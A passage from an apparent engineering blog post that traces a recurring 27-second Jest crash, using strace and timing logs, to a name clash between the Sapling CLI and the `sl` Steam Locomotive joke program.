PASS   @cloudflare/backstage-components  plugins/backstage-components/src/components/Cards/ClusterDependencyCard/ClusterDependencyCard.test.tsx
PASS   @internal/plugin-software-excellence-dashboard  plugins/software-excellence-dashboard/src/components/AppDetail/AppDetail.test.tsx
PASS   @cloudflare/backstage-entities  plugins/backstage-entities/src/AccessLinkPolicy.test.ts


  ● Test suite failed to run

thrown: [Error]</code></pre>
            <p>Re-running it or matching different tests will give slightly different run logs, but they always end with the same error.</p><p>By now, I've figured out that yarn test is actually backed by <a href="https://jestjs.io/"><u>Jest, a JavaScript testing framework</u></a>, so my next strategy is simply trying different Jest flags to see what sticks, but invariably, none do:</p>
            <pre><code>2025-03-19 15:16  time yarn test --detectOpenHandles plugins
2025-03-19 15:18  time yarn test --runInBand .
2025-03-19 15:19  time yarn test --detectLeaks .
2025-03-19 15:20  yarn test --debug aetsnuheosnuhoe
2025-03-19 15:21  yarn test --debug --no-watchman nonexisis
2025-03-19 15:21  yarn test --jest-help
2025-03-19 15:22  yarn test --debug --no-watch ooooooo &gt; ~/jest.config
</code></pre>
            
    <div>
      <h2>A pattern finally emerges</h2>
      <a href="#a-pattern-finally-emerges">
        
      </a>
    </div>
    <p>Eventually, after re-running it so many times, I started to notice a pattern. By default, after a test run Jest drops you into an interactive menu where you can (Q)uit, run (A)ll tests, etc., and I realized that Jest would eventually crash even while idling in that menu. I started timing the runs, which led me to the second breakthrough:</p>
            <pre><code>› Press q to quit watch mode.
 › Press Enter to trigger a test run.


  ● Test suite failed to run

thrown: [Error]

error Command failed with exit code 1.
info Visit https://yarnpkg.com/en/docs/cli/run for documentation about this command.
yarn test .  109.96s user 14.21s system 459% cpu 27.030 total</code></pre>
            
            <pre><code>RUNS   @cloudflare/backstage-components  plugins/backstage-components/src/components/Cards/TeamRoles/CustomerSuccessCard.test.tsx
 RUNS   @cloudflare/backstage-app  packages/app/src/components/catalog/EntityFipsPicker/EntityFipsPicker.test.tsx

Test Suites: 2 failed, 23 passed, 25 of 65 total
Tests:       217 passed, 217 total
Snapshots:   0 total
error Command failed with exit code 1.
info Visit https://yarnpkg.com/en/docs/cli/run for documentation about this command.
yarn test .  110.85s user 14.04s system 463% cpu 26.974 total</code></pre>
            <p>No matter what Jest was doing, it always crashed after almost exactly 27 wall-clock seconds. It literally didn't matter what tests I selected or re-ran. Even the original problem, a bare <code>yarn test</code> (no tests selected, just hangs), would crash after 27 seconds:</p>
            <pre><code>Determining test suites to run...

  ● Test suite failed to run

thrown: [Error]

error Command failed with exit code 1.
info Visit https://yarnpkg.com/en/docs/cli/run for documentation about this command.
yarn test  2.05s user 0.71s system 10% cpu 27.094 total
</code></pre>
            <p>Obviously, some sort of timeout. 27 seconds is kind of a weird number (unlike, say, 5 seconds or 60 seconds) but let's try:</p>
            <pre><code>2025-03-19 15:09  find | fgrep 27
2025-03-19 15:09  git grep '\b27\b'
</code></pre>
            <p>No decent hits.</p><p>How about something like 20+7 or even 20+5+2? <i>Nope.</i></p><p>Googling/GPT-4oing for "jest timeout 27 seconds" again yielded nothing useful. Far more people were having problems with testing asynchronously, or getting their tests to time out, than with Jest proper.</p><p>At this time, my colleague came back from his call, and with his help we determined some other things:</p><ul><li><p>his system (macOS) is not affected at all, versus mine (Linux)</p></li><li><p><a href="https://github.com/nvm-sh/nvm?tab=readme-ov-file#intro"><u>nvm use v20</u></a> didn't fix it</p></li><li><p>I can reproduce it on a clean clone of <a href="https://github.com/backstage/backstage"><u>github.com/backstage/backstage</u></a>. The tests seem to progress further, about 50+ seconds. This lends credence to a running theory that the filesystem crawler/watcher is the one crashing: backstage/backstage is a bigger repo than the internal Cloudflare instance, so it takes longer.</p></li></ul><p>I next went <i>on a little detour</i> to grab another colleague who I know has been working on a <a href="https://nextjs.org/"><u>Next.js</u></a> project. He's one of the few other people nearby who knows anything about <a href="https://nodejs.org/en"><u>Node.js</u></a>. In my experience with troubleshooting it’s helpful to get multiple perspectives, so we can cover each other’s blind spots and avoid tunnel vision.</p><p>I then tried invoking many yarn tests in parallel, and I did manage to stretch the crash time out to 28 or 29 seconds when the system was under heavy load. So this tells me that it might not be a hard timeout, but rather processing driven. A series of sleeps <i>chugging along</i>, perhaps?</p><p>By now, there is a veritable crowd of curious onlookers gathered in front of my terminal, marveling at the consistent 27-second crash and trading theories. 
At some point, someone asked if I had tried rebooting yet, and I had to sheepishly reply that I hadn't, but "I'm absolutely sure it wouldn't help whatsoever".</p><p>And the astute reader can already guess that rebooting did nothing at all, or else this wouldn't even be a story worth telling. Besides, haven't I teased in the clickbaity title about some crazy Steam Locomotive from 1993?</p>
    <div>
      <h2>Strace to the rescue</h2>
      <a href="#strace-to-the-rescue">
        
      </a>
    </div>
    <p>My colleague then put us <i>back on track</i> and suggested <a href="https://strace.io/"><u>strace</u></a>, and I decided to trace the simpler case of the idling menu (rather than trace running tests, which generated far more syscalls).</p>
            <pre><code>Watch Usage
 › Press a to run all tests.
 › Press f to run only failed tests.
 › Press o to only run tests related to changed files.
 › Press p to filter by a filename regex pattern.
 › Press t to filter by a test name regex pattern.
 › Press q to quit watch mode.
 › Press Enter to trigger a test run.
[], 1024, 1000)          = 0
openat(AT_FDCWD, "/proc/self/stat", O_RDONLY) = 21
read(21, "42375 (node) R 42372 42372 11692"..., 1023) = 301
close(21)                               = 0
epoll_wait(13, [], 1024, 0)             = 0
epoll_wait(13, [], 1024, 999)           = 0
openat(AT_FDCWD, "/proc/self/stat", O_RDONLY) = 21
read(21, "42375 (node) R 42372 42372 11692"..., 1023) = 301
close(21)                               = 0
epoll_wait(13, [], 1024, 0)             = 0
epoll_wait(13,</code></pre>
            <p>It basically <code>epoll_waits</code> until 27 seconds are up and then, right when the crash happens:</p>
            <pre><code> ● Test suite failed to run                                                                                                                
                                                                                                                                            
thrown: [Error]                                                                                                                             
                                                                                                                                            
0x7ffd7137d5e0, 1024, 1000) = -1 EINTR (Interrupted system call)
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=42578, si_uid=1000, si_status=1, si_utime=0, si_stime=0} ---
read(4, "*", 1)                     	= 1
write(15, "\210\352!\5\0\0\0\0\21\0\0\0\0\0\0\0", 16) = 16
write(5, "*", 1)                    	= 1
rt_sigreturn({mask=[]})             	= -1 EINTR (Interrupted system call)
epoll_wait(13, [{events=EPOLLIN, data={u32=14, u64=14}}], 1024, 101) = 1
read(14, "\210\352!\5\0\0\0\0\21\0\0\0\0\0\0\0", 512) = 16
wait4(42578, [{WIFEXITED(s) &amp;&amp; WEXITSTATUS(s) == 1}], WNOHANG, NULL) = 42578
rt_sigprocmask(SIG_SETMASK, ~[RTMIN RT_1], [], 8) = 0
read(4, "*", 1)                     	= 1
rt_sigaction(SIGCHLD, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x79e91e045330}, NULL, 8) = 0
write(5, "*", 1)                    	= 1
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
mmap(0x34ecad880000, 1495040, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_NORESERVE, -1, 0) = 0x34ecad880000
madvise(0x34ecad880000, 1495040, MADV_DONTFORK) = 0
munmap(0x34ecad9ae000, 258048)      	= 0
mprotect(0x34ecad880000, 1236992, PROT_READ|PROT_WRITE) = 0</code></pre>
            <p>I don't know about you, but sometimes I look at straces and wonder “Do people actually read this gibberish?” Fortunately, in the modern generative AI era, we can count on GPT-4o to gently chide: the process was interrupted (<code>EINTR</code>) by a signal from its child (<code>SIGCHLD</code>), which means you forgot about the children, silly human. Is the problem with <i>one of the cars rather than the engine</i>?</p><p>Following this <i>train of thought</i>, I now re-ran with <code>strace --follow-forks</code>, which revealed a giant flurry of activity that promptly overflowed my terminal buffer. The investigation is really <i>gaining steam</i> now. The original trace weighs in at a hefty 500,000 lines, but here is a smaller equivalent version derived from a clean instance of backstage: <a href="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3IX3GEpe1WPllLf4tJBw5l/9a6c00a3eb06693d545ca49834ded987/trace.log.gz"><u>trace.log.gz</u></a>. I have uploaded this trace here because the by-now overhyped Steam Locomotive is finally making its grand appearance, and I know there'll be people who'd love nothing more than to crawl through a haystack of system calls looking for a train-sized needle. Consider yourself lucky; I had to do it without even knowing what I was looking for, much less that it was a whole Steam Locomotive.</p><hr /><p>This section is left intentionally blank to allow locomotive enthusiasts who want to find the train on their own to do so first.</p><hr /><p>Remember my comment about straces being gibberish? Actually, I was kidding. 
So there are a few ways to make it more manageable, and with experience you'll learn which system calls to pay attention to, such as <code>execve</code>, <code>chdir</code>, <code>open</code>, <code>read</code>, <code>fork</code>, and signals, and which ones to skim over, such as <code>mprotect</code>, <code>mmap</code>, and <code>futex</code>.</p><p>Since I'm writing this account after the fact, let's cheat a little and assume I was super smart and zeroed in on <code>execve</code> correctly on the first try:</p>
            <pre><code>🌈  ~  zgrep execve trace.log.gz | head
execve("/home/yew/.nvm/versions/node/v18.20.6/bin/yarn", ["yarn", "test", "steam-regulator"], 0x7ffdff573148 /* 72 vars */) = 0
execve("/home/yew/.pyenv/shims/node", ["node", "/home/yew/.nvm/versions/node/v18"..., "test", "steam-regulator"], 0x7ffd64f878c8 /* 72 vars */) = -1 ENOENT (No such file or directory)
execve("/home/yew/.pyenv/bin/node", ["node", "/home/yew/.nvm/versions/node/v18"..., "test", "steam-regulator"], 0x7ffd64f878c8 /* 72 vars */) = -1 ENOENT (No such file or directory)
execve("/home/yew/repos/secrets/bin/node", ["node", "/home/yew/.nvm/versions/node/v18"..., "test", "steam-regulator"], 0x7ffd64f878c8 /* 72 vars */) = -1 ENOENT (No such file or directory)
execve("/home/yew/.nvm/versions/node/v18.20.6/bin/node", ["node", "/home/yew/.nvm/versions/node/v18"..., "test", "steam-regulator"], 0x7ffd64f878c8 /* 72 vars */) = 0
[pid 49307] execve("/bin/sh", ["/bin/sh", "-c", "backstage-cli repo test resource"...], 0x3d17d6d0 /* 156 vars */ &lt;unfinished ...&gt;
[pid 49307] &lt;... execve resumed&gt;)   	= 0
[pid 49308] execve("/home/yew/cloudflare/repos/backstage/node_modules/.bin/backstage-cli", ["backstage-cli", "repo", "test", "steam-regulator"], 0x5e7ef80051d8 /* 156 vars */ &lt;unfinished ...&gt;
[pid 49308] &lt;... execve resumed&gt;)   	= 0
[pid 49308] execve("/tmp/yarn--1742459197616-0.9027914591640542/node", ["node", "/home/yew/cloudflare/repos/backs"..., "repo", "test", "steam-regulator"], 0x7ffcc18af270 /* 156 vars */) = 0
🌈  ~  zgrep execve trace.log.gz | wc -l
2254
</code></pre>
            <p>Phew, 2,000 is a lot of <code>execves</code> . Let's get the unique ones, plus their counts:</p>
            <pre><code>🌈  ~  zgrep -oP '(?&lt;=execve\(")[^"]+' trace.log.gz | xargs -L1 basename | sort | uniq -c | sort -nr
    576 watchman
    576 hg
    368 sl
    358 git
     16 sl.actual
     14 node
      2 sh
      1 yarn
      1 backstage-cli</code></pre>
            <p>Have you spotted the <b>S</b>team <b>L</b>ocomotive yet? I spotted it immediately because this is My Own System and Surely This Means I Am Perfectly Aware Of Everything That Is Installed Unlike, er, <code>node_modules</code>.</p><p><code>sl</code>  is actually a<a href="https://github.com/mtoyoda/sl"> <u>fun little joke program from 1993</u></a> that plays on users' tendencies to make a typo on <a href="https://man7.org/linux/man-pages/man1/ls.1.html"><code><u>ls</u></code></a>. When <code>sl</code>  runs, it clears your terminal to make way for an animated steam locomotive to come chugging through.</p>
            <pre><code>                        (  ) (@@) ( )  (@)  ()	@@	O 	@ 	O 	@  	O
                   (@@@)
               (	)
            (@@@@)
 
          (   )
      ====    	________            	___________
  _D _|  |_______/    	\__I_I_____===__|_________|
   |(_)---  |   H\________/ |   |    	=|___ ___|  	_________________
   / 	|  |   H  |  | 	|   |     	||_| |_|| 	_|            	\_____A
  |  	|  |   H  |__--------------------| [___] |   =|                    	|
  | ________|___H__/__|_____/[][]~\_______|   	|   -|                    	|
  |/ |   |-----------I_____I [][] []  D   |=======|____|________________________|_
__/ =| o |=-~~\  /~~\  /~~\  /~~\ ____Y___________|__|__________________________|_
 |/-=|___|=O=====O=====O=====O   |_____/~\___/      	|_D__D__D_|  |_D__D__D_|
  \_/  	\__/  \__/  \__/  \__/  	\_/           	\_/   \_/	\_/   \_/</code></pre>
            <p>When I first saw that Jest was running <code>sl</code> so many times, my first thought was to ask my colleague if <code>sl</code> is a valid command on his Mac, and of course it is not. After all, which serious engineer would stuff their machine full of silly commands like <code>sl</code>, <a href="https://r-wos.org/hacks/gti"><code><u>gti</u></code></a>, <a href="https://en.wikipedia.org/wiki/Cowsay"><code><u>cowsay</u></code></a>, or <a href="https://linuxcommandlibrary.com/man/toilet"><code><u>toilet</u></code></a>? The next thing I tried was to rename <code>sl</code> to something else, and sure enough all my problems disappeared: <code>yarn test</code> started working perfectly.</p>
    <div>
      <h2>So what does Jest have to do with Steam Locomotives?</h2>
      <a href="#so-what-does-jest-have-to-do-with-steam-locomotives">
        
      </a>
    </div>
    <p><a href="https://github.com/jestjs/jest/issues/14046"><u>Nothing, that's what</u></a>. The whole affair is an unfortunate naming clash between <code>sl</code> the Steam Locomotive and <code>sl</code> the<a href="https://github.com/facebook/sapling?tab=readme-ov-file#sapling-cli"> <u>Sapling CLI</u></a>. Jest wanted <code>sl</code> the source control system, but ended up getting steam-rolled by <code>sl</code> the Steam Locomotive.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6BDDm4dEbvMuVyn1J5reqf/ac7f914b3b23608941c84a6cd7aadbb1/image3.png" />
          </figure><p>Fortunately the devs took it in good humor, and<a href="https://github.com/jestjs/jest/pull/15053"> <u>made a (still unreleased) fix</u></a>. Check out the train memes!</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/n8MrPDXuVMuze7UEkxCie/5d187401c8bb12d8e3e0ef89d03b87f3/image4.png" />
          </figure>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/Fot6dhfCsL0zvxYkVEh6a/440436342f93d1f7aca7dd70a9059436/image2.png" />
          </figure><p>At this point the main story has ended. However, there are still some unresolved nagging questions, like...</p>
    <div>
      <h2>How did the crash arrive at the magic number of a relatively even 27 seconds?</h2>
      <a href="#how-did-the-crash-arrive-at-the-magic-number-of-a-relatively-even-27-seconds">
        
      </a>
    </div>
    <p>I don't know. I'm not even sure a forked child executing <code>sl</code> still has a terminal attached, but the travel time of the train does depend on the terminal width: the wider it is, the longer it takes:</p>
            <pre><code>🌈  ~  tput cols
425
🌈  ~  time sl
sl  0.19s user 0.06s system 1% cpu 20.629 total
🌈  ~  tput cols
58
🌈  ~  time sl  
sl  0.03s user 0.01s system 0% cpu 5.695 total</code></pre>
            <p>So the first thing I tried was to run <code>yarn test</code> in a ridiculously narrow terminal to see what would happen:</p>
            <pre><code>Determin
ing test
 suites 
to run..
.       
        
  ● Test
 suite f
ailed to
 run    
        
thrown: 
[Error] 
        
error Co
mmand fa
iled wit
h exit c
ode 1.  
info Vis
it https
://yarnp
kg.com/e
n/docs/c
li/run f
or docum
entation
 about t
his comm
and.    
yarn tes
t  1.92s
 user 0.
67s syst
em 9% cp
u 27.088
 total  
🌈  back
stage [m
aster] t
put cols
        
8</code></pre>
            <p>Alas, the terminal width doesn't affect Jest at all. Jest calls <a href="https://github.com/jestjs/jest/pull/13941/files#diff-4c649a2515ae8d1dc1ed6ebccbe3b43e54e5d7217cb011df616dcf471a80319cR59"><code><u>sl via execa</u></code></a>, so let's mock that up locally:</p>
            <pre><code>🌈  choochoo  cat runSl.mjs 
import {execa} from 'execa';
const { stdout } = await execa('tput', ['cols']);
console.log('terminal colwidth:', stdout);
await execa('sl', ['root']);
🌈  choochoo  time node runSl.mjs
terminal colwidth: 80
node runSl.mjs  0.21s user 0.06s system 4% cpu 6.730 total</code></pre>
            <p>So <code>execa</code> uses the default terminal width of 80, which takes the train 6.7 seconds to cross. And 27 seconds divided by 6.7 is awfully close to 4. So is Jest running <code>sl</code> 4 times? Let's do a poor man's <a href="https://github.com/bpftrace/bpftrace"><u>bpftrace</u></a> by hooking into <code>sl</code> like so:</p>
            <pre><code>#!/bin/bash

uniqid=$RANDOM
echo "$(date --utc +"%Y-%m-%d %H:%M:%S.%N") $uniqid started" &gt;&gt; /home/yew/executed.log
/usr/games/sl.actual "$@"
echo "$(date --utc +"%Y-%m-%d %H:%M:%S.%N") $uniqid ended" &gt;&gt; /home/yew/executed.log</code></pre>
            <p>And if we check <code>executed.log</code>, <code>sl</code> is indeed executed in 4 waves, albeit by 5 workers simultaneously in each wave:</p>
            <pre><code>#wave1
2025-03-20 13:23:57.125482563 21049 started
2025-03-20 13:23:57.127526987 21666 started
2025-03-20 13:23:57.131099388 4897 started
2025-03-20 13:23:57.134237754 102 started
2025-03-20 13:23:57.137091737 15733 started
#wave1 ends, wave2 starts
2025-03-20 13:24:03.704588580 21666 ended
2025-03-20 13:24:03.704621737 21049 ended
2025-03-20 13:24:03.707780748 4897 ended
2025-03-20 13:24:03.712086346 15733 ended
2025-03-20 13:24:03.711953000 102 ended
2025-03-20 13:24:03.714831149 18018 started
2025-03-20 13:24:03.721293279 23293 started
2025-03-20 13:24:03.724600164 27918 started
2025-03-20 13:24:03.729763900 15091 started
2025-03-20 13:24:03.733176122 18473 started
#wave2 ends, wave3 starts
2025-03-20 13:24:10.294286746 18018 ended
2025-03-20 13:24:10.297261754 23293 ended
2025-03-20 13:24:10.300925031 27918 ended
2025-03-20 13:24:10.300950334 15091 ended
2025-03-20 13:24:10.303498710 24873 started
2025-03-20 13:24:10.303980494 18473 ended
2025-03-20 13:24:10.308560194 31825 started
2025-03-20 13:24:10.310595182 18452 started
2025-03-20 13:24:10.314222848 16121 started
2025-03-20 13:24:10.317875812 30892 started
#wave3 ends, wave4 starts
2025-03-20 13:24:16.883609316 24873 ended
2025-03-20 13:24:16.886708598 18452 ended
2025-03-20 13:24:16.886867725 31825 ended
2025-03-20 13:24:16.890735338 16121 ended
2025-03-20 13:24:16.893661911 21975 started
2025-03-20 13:24:16.898525968 30892 ended
#crash imminent! wave4 ending, wave5 starting...
2025-03-20 13:24:23.474925807 21975 ended</code></pre>
            <p>The logs were emitted for about 26.35 seconds, which is close to 27. It probably crashed just as wave4 was reporting back. And each wave lasts about 6.7 seconds, right on the money with manual measurement. </p>
    <div>
      <h2>So why is Jest running sl in 4 waves? Why did it crash at the start of the 5th wave?</h2>
      <a href="#so-why-is-jest-running-sl-in-4-waves-why-did-it-crash-at-the-start-of-the-5th-wave">
        
      </a>
    </div>
    <p>Let's again modify the poor man's bpftrace to also log the args and working directory:</p>
            <pre><code>echo "$(date --utc +"%Y-%m-%d %H:%M:%S.%N") $uniqid started: $@ at $PWD" &gt;&gt; /home/yew/executed.log</code></pre>
            <p>From the results we can see that the 5 workers are busy executing <code>sl root</code>, which corresponds to the <code>getRoot()</code> function in <code>jest-changed-files/sl.ts</code>:</p>
            <pre><code>2025-03-21 05:50:22.663263304  started: root at /home/yew/cloudflare/repos/backstage/packages/app/src
2025-03-21 05:50:22.665550470  started: root at /home/yew/cloudflare/repos/backstage/packages/backend/src
2025-03-21 05:50:22.667988509  started: root at /home/yew/cloudflare/repos/backstage/plugins/access/src
2025-03-21 05:50:22.671781519  started: root at /home/yew/cloudflare/repos/backstage/plugins/backstage-components/src
2025-03-21 05:50:22.673690514  started: root at /home/yew/cloudflare/repos/backstage/plugins/backstage-entities/src
2025-03-21 05:50:29.247573899  started: root at /home/yew/cloudflare/repos/backstage/plugins/catalog-types-common/src
2025-03-21 05:50:29.251173536  started: root at /home/yew/cloudflare/repos/backstage/plugins/cross-connects/src
2025-03-21 05:50:29.255263605  started: root at /home/yew/cloudflare/repos/backstage/plugins/cross-connects-backend/src
2025-03-21 05:50:29.257293780  started: root at /home/yew/cloudflare/repos/backstage/plugins/pingboard-backend/src
2025-03-21 05:50:29.260285783  started: root at /home/yew/cloudflare/repos/backstage/plugins/resource-insights/src
2025-03-21 05:50:35.823374079  started: root at /home/yew/cloudflare/repos/backstage/plugins/scaffolder-backend-module-gaia/src
2025-03-21 05:50:35.825418386  started: root at /home/yew/cloudflare/repos/backstage/plugins/scaffolder-backend-module-r2/src
2025-03-21 05:50:35.829963172  started: root at /home/yew/cloudflare/repos/backstage/plugins/security-scorecard-dash/src
2025-03-21 05:50:35.832597778  started: root at /home/yew/cloudflare/repos/backstage/plugins/slo-directory/src
2025-03-21 05:50:35.834631869  started: root at /home/yew/cloudflare/repos/backstage/plugins/software-excellence-dashboard/src
2025-03-21 05:50:42.404063080  started: root at /home/yew/cloudflare/repos/backstage/plugins/teamcity/src</code></pre>
            <p>The 16 entries here correspond neatly to the 16 <code>rootDirs</code> configured in Jest for Cloudflare's backstage. We have 5 trains, and we want to visit 16 stations, so let's do some simple math: 16/5 = 3.2, which means our trains need to go back and forth at least 4 times to cover them all.</p>
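            <p>As a quick sanity check of that ceiling division (nothing Jest-specific here, just shell integer arithmetic):</p>
            <pre><code># 16 rootDirs visited by 5 parallel workers: each worker makes
# ceil(16/5) trips, computed here with integer arithmetic
roots=16
workers=5
echo $(( (roots + workers - 1) / workers ))</code></pre>
            <p>This prints <code>4</code>, matching the four waves in the log.</p>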
    <div>
      <h2>Final mystery: Why did it crash?</h2>
      <a href="#final-mystery-why-did-it-crash">
        
      </a>
    </div>
    <p>Let's go back to the very start of our journey. The original <code>[Error]</code> thrown was actually<a href="https://github.com/jestjs/jest/pull/13941/files#diff-4c649a2515ae8d1dc1ed6ebccbe3b43e54e5d7217cb011df616dcf471a80319cR48"> <u>from here</u></a> and after modifying <code>node_modules/jest-changed-files/index.js</code>, I found that the error is <code>shortMessage: 'Command failed with ENAMETOOLONG: sl status...</code>'  and the reason why became clear when I interrogated Jest about what it thinks the repos are.</p><p>While the git repo is what you'd expect, the sl "repo" looks amazingly like a <i>train wreck in motion</i>:</p>
            <pre><code>got repos.git as Set(1) { '/home/yew/cloudflare/repos/backstage' }
got repos.sl as Set(1) {
  '\x1B[?1049h\x1B[1;24r\x1B[m\x1B(B\x1B[4l\x1B[?7h\x1B[?25l\x1B[H\x1B[2J\x1B[15;80H_\x1B[15;79H_\x1B[16d|\x1B[9;80H_\x1B[12;80H|\x1B[13;80H|\x1B[14;80H|\x1B[15;78H__/\x1B[16;79H|/\x1B[17;80H\\\x1B[9;
  79H_D\x1B[10;80H|\x1B[11;80H/\x1B[12;79H|\x1B[K\x1B[13d\b|\x1B[K\x1B[14d\b|/\x1B[15;1H\x1B[1P\x1B[16;78H|/-\x1B[17;79H\\_\x1B[9;1H\x1B[1P\x1B[10;79H|(\x1B[11;79H/\x1B[K\x1B[12d\b\b|\x1B[K\x1B[13d\b|
  _\x1B[14;1H\x1B[1P\x1B[15;76H__/ =\x1B[16;77H|/-=\x1B[17;78H\\_/\x1B[9;77H_D _\x1B[10;78H|(_\x1B[11;78H/\x1B[K\x1B[12d\b\b|\x1B[K\x1B[13d\b| _\x1B[14;77H|/ |\x1B[15;75H__/
  =|\x1B[16;76H|/-=|\x1B[17;1H\x1B[1P\x1B[8;80H=\x1B[9;76H_D _|\x1B[10;77H|(_)\x1B[11;77H/\x1B[K\x1B[12d\b\b|\x1B[K\x1B[13d\b|
  _\r\x1B[14d\x1B[1P\x1B[15d\x1B[1P\x1B[16;75H|/-=|_\x1B[17;1H\x1B[1P\x1B[8;79H=\r\x1B[9d\x1B[1P\x1B[10;76H|(_)-\x1B[11;76H/\x1B[K\x1B[12d\b\b|\x1B[K\x1B[13d\b| _\r\x1B[14d\x1B[1P\x1B[15;73H__/ =|
  o\x1B[16;74H|/-=|_\r\x1B[17d\x1B[1P\x1B[8;78H=\r\x1B[9d\x1B[1P\x1B[10;75H|(_)-\x1B[11;75H/\x1B[K\x1B[12d\b\b|\x1B[K\x1B[13d\b|
  _\r\x1B[14d\x1B[1P\x1B[15d\x1B[1P\x1B[16;73H|/-=|_\r\x1B[17d\x1B[1P\x1B[8;77H=\x1B[9;73H_D _|  |\x1B[10;74H|(_)-\x1B[11;74H/     |\x1B[12;73H|      |\x1B[13;73H| _\x1B[14;73H|/ |   |\x1B[15;71H__/
  =| o |\x1B[16;72H|/-=|___|\x1B[17;1H\x1B[1P\x 1B[5;79H(@\x1B[7;77H(\r\x1B[8d\x1B[1P\x1B[9;72H_D _|  |_\x1B[10;1H\x1B[1P\x1B[11d\x1B[1P\x1B[12d\x1B[1P\x1B[13;72H| _\x1B[14;72H|/ |   |-\x1B[15;70H__/
  =| o |=\x1B[16;71H|/-=|___|=\x1B[17;1H\x1B[1P\x1B[8d\x1B[1P\x1B[9;71H_D _|  |_\r\x1B[10d\x1B[1P\x1B[11d\x1B[1P\x1B[12d\x1B[1P\x1B[13;71H| _\x1B[14;71H|/ |   |-\x1B[15;69H__/ =| o
  |=-\x1B[16;70H|/-=|___|=O\x1B[17;71H\\_/      \\\x1B[8;1H\x1B[1P\x1B[9;70H_D _|  |_\x1B[10;71H|(_)---  |\x1B[11;71H/     |  |\x1B[12;70H|      |  |\x1B[13;70H| _\x1B[80G|\x1B[14;70H|/ |
  |-\x1B[15;68H__/ =| o |=-~\x1B[16;69H|/-=|___|=\x1B[K\x1B[17;70H\\_/      \\O\x1B[8;1H\x1B[1P\x1B[9;69H_D _|  |_\r\x1B[10d\x1B[1P\x1B[11d\x1B[1P\x1B[12d\x1B[1P\x1B[13;69H| _\x1B[79G|_\x1B[14;69H|/ |
  |-\x1B[15;67H__/ =| o |=-~\r\x1B[16d\x1B[1P\x1B[17;69H\\_/      \\_\x1B[4d\b\b(@@\x1B[5;75H(    )\x1B[7;73H(@@@)\r\x1B[8d\x1B[1P\x1B[9;68H_D _|
  |_\r\x1B[10d\x1B[1P\x1B[11d\x1B[1P\x1B[12d\x1B[1P\x1B[13;68H| _\x1B[78G|_\x1B[14;68H|/ |   |-\x1B[15;66H__/ =| o |=-~~\\\x1B[16;67H|/-=|___|=   O\x1B[17;68H\\_/ \\__/\x1B[8;1H\x1B[1P\x1B[9;67H_D _|
  |_\r\x1B[10d\x1B[1P\x1B[11d\x1B[1P\x1B[12d\x1B[1P\x1B[13;67H| _\x1B[77G|_\x1B[14;67H|/ |   |-\x1B[15;65H__/ =| o |=-~O==\x1B[16;66H|/-=|___|= |\x1B[17;1H\x1B[1P\x1B[8d\x1B[1P\x1B[9;66H_D _|
  |_\x1B[10;67H|(_)---  |   H\x1B[11;67H/     |  |   H\x1B[12;66H|      |  |   H\x1B[13;66H| _\x1B[76G|___H\x1B[14;66H|/ |   |-\x1B[15;64H__/ =| o |=-O==\x1B[16;65H|/-=|___|=
  |\r\x1B[17d\x1B[1P\x1B[8d\x1B[1P\x1B[9;65H_D _|  |_\x1B[80G/\x1B[10;66H|(_)---  |   H\\\x1B[11;1H\x1B[1P\x1B[12d\x1B[1P\x1B[13;65H| _\x1B[75G|___H_\x1B[14;65H|/ | |-\x1B[15;63H__/ =| o |=-~~\\
  /\x1B[16;64H|/-=|___|=O=====O\x1B[17;65H\\_/      \\__/  \\\x1B[1;4r\x1B[4;1H\n' + '\x1B[1;24r\x1B[4;74H(    )\x1B[5;71H(@@@@)\x1B[K\x1B[7;69H(   )\x1B[K\x1B[8;68H====
  \x1B[80G_\x1B[9;1H\x1B[1P\x1B[10;65H|(_)---  |   H\\_\x1B[11;1H\x1B[1P\x1B[12d\x1B[1P\x1B[13;64H| _\x1B[74G|___H_\x1B[14;64H|/ |   |-\x1B[15;62H__/ =| o |=-~~\\  /~\x1B[16;63H|/-=|___|=
  ||\x1B[K\x1B[17;64H\\_/      \\O=====O\x1B[8;67H==== \x1B[79G_\r\x1B[9d\x1B[1P\x1B[10;64H|(_)---  |   H\\_\x1B[11;64H/     |  |   H  |\x1B[12;63H|      |  |   H  |\x1B[13;63H|
  _\x1B[73G|___H__/\x1B[14;63H|/ |   |-\x1B[15;61H__/ =| o |=-~~\\  /~\r\x1B[16d\x1B[1P\x1B[17;63H\\_/      \\_\x1B[8;66H==== \x1B[78G_\r\x1B[9d\x1B[1P\x1B[10;63H|(_)---  |
  H\\_\r\x1B[11d\x1B[1P\x1B[12;62H|      |  |   H  |_\x1B[13;62H| _\x1B[72G|___H__/_\x1B[14;62H|/ |   |-\x1B[15;60H__/ =| o |=-~~\\  /~~\\\x1B[16;61H|/-=|___|=   O=====O\x1B[17;62H\\_/      \\__/
  \\__/\x1B[8;65H==== \x1B[77G_\r\x1B[9d\x1B[1P\x1B[10;62H|(_)---  |   H\\_\r\x1B[11d\x1B[1P\x1B[12;61H|      |  |   H  |_\x1B[13;61H| _\x1B[71G|___H__/_\x1B[14;61H|/ |   |-\x1B[80GI\x1B[15;59H__/ =|
  o |=-~O=====O==\x1B[16;60H|/-=|___|=    ||    |\x1B[17;1H\x1B[1P\x1B[2;79H(@\x1B[3;74H(   )\x1B[K\x1B[4;70H(@@@@)\x1B[K\x1B[5;67H(    )\x1B[K\x1B[7;65H(@@@)\x1B[K\x1B[8;64H====
  \x1B[76G_\r\x1B[9d\x1B[1P\x1B[10;61H|(_)---  |   H\\_\x1B[11;61H/     |  |   H  |  |\x1B[12;60H|      |  |   H  |__-\x1B[13;60H| _\x1B[70G|___H__/__|\x1B[14;60H|/ |   |-\x1B[79GI_\x1B[15;58H__/ =| o
  |=-O=====O==\x1B[16;59H|/-=|___|=    ||    |\r\x1B[17d\x1B[1P\x1B[8;63H==== \x1B[75G_\r\x1B[9d\x1B[1P\x1B[10;60H|(_)---  |   H\\_\r\x1B[11d\x1B[1P\x1B[12;59H|      |  |   H  |__-\x1B[13;59H|
